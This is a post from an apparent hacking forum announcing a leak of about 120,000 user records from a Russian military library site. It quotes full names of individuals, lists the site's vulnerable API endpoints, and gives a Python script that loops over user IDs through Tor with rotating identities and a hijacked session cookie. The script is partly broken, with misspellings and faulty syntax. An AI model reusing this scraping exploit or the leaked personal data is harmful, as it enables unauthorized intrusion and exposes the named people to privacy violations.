Login

PocExploiter · (This post was last modified: 10-06-23, 02:20 AM by @Lucifer.)

Hello DarkForums Community,
Today I have uploaded the 120,000 Russian military .mil.ru for you to download, thanks for reading and enjoy!

Author: pocexploiter
Notified: for this an access is required which later a pentesting could be done.

Quote:{"mid":35457,"lastname":"Грабовенко","firstname":"Илья","patronymic":"Анатольевич","displayname":"Грабовенко Илья Анатольевич","cathedra":null,"faculty":null,"groupname":null,"militaryrank":null,"specialisation":null,"position":null,"rfid":"","photosize":0}

Download Records:

Hidden Content

You must register or login to view this content.

Vulnerabilities:

- Bypass File Upload Format– Disclosure Personal Information– User activity monitoring
Tutorial Explotation: Notified: for this an access is required which later a pentesting could be done.

[Image: login.jpg]

[b]Paramters[/b]: https://biblio2.mil.ru /api/reader/(ID) – Here we can see the records from 1 to 120,000. We try to send many requests with the help of burp suite, intruder option. [Image: BANK-1024x716.jpg]

 Code:
{“mid”:7316,”lastname”:”Яцкевич”,”firstname”:”Илья”,”patronymic”:”Валерьевич”,”displayname”:”Яцкевич Илья Валерьевич”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

{“mid”:7547,”lastname”:”Богданов”,”firstname”:”Сергей”,”patronymic”:”Владимирович”,”displayname”:”Богданов Сергей Владимирович”,”cathedra”:null,”faculty”:null,”groupname”:null,”militaryrank”:null,”specialisation”:null,”position”:null,”rfid”:””,”photosize”:0}

Now Exposed Admin:

[Image: Screenshot_43.jpg]

https://biblio2.mil.ru /book_open_history/(ID) – It allows me to see the content that each of the users read
https://biblio2.mil.ru /formular_print/(ID) – Exposed PDF form information military

[b]CODE EXPLOIT:[/b]

 PHP Code:
#!/usr/bin/python3
import os
import sys
import time
import requests
from fake_useragent import UserAgent
from stem import Signal
from stem.control import Controller
# Autor: SC0RP10N
proxies = {
    'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'
}
if(len(sys.argrv) == 1):
    print("Missing cookie argument\n EXAMPLE: python3 Russia.py 'library.login= PRIVATE KEY!")
elif(len(sys.argv) == 2):
    for i in range(100642):
    headers = { 'User-Agent': UserAgent(browsers=['edge', 'firefox']).random }
    time.sleep(1)
    with Controller.from_port(port = 9051) as c:
        c.authenticate(# PLACE TOR AUTHENTICATION PASSWORD HERE AS A STRING)
        c.signal(Signal.NEWNYM)
        url = "'https://biblio2.mil.ru/api/reader/1" + str(i) + "'"
        comando = "curl --proxy socks5://127.0.0.1:9050 " + url + " --cokkie='" + sys.argv[1] + "'")
        print(comando)
        print("\nIndice: " + str(i) + "\n")
        os.system(comando) 

The vulnerability allows viewing details of system users.
Other identical vulnerabilities have been verified
The User API Actions with administrator privileges were also identified.

We have also been able to download documents: weapons design, operation of military equipment, military training, logistics, ballistic projects, etc. [Image: books.jpg]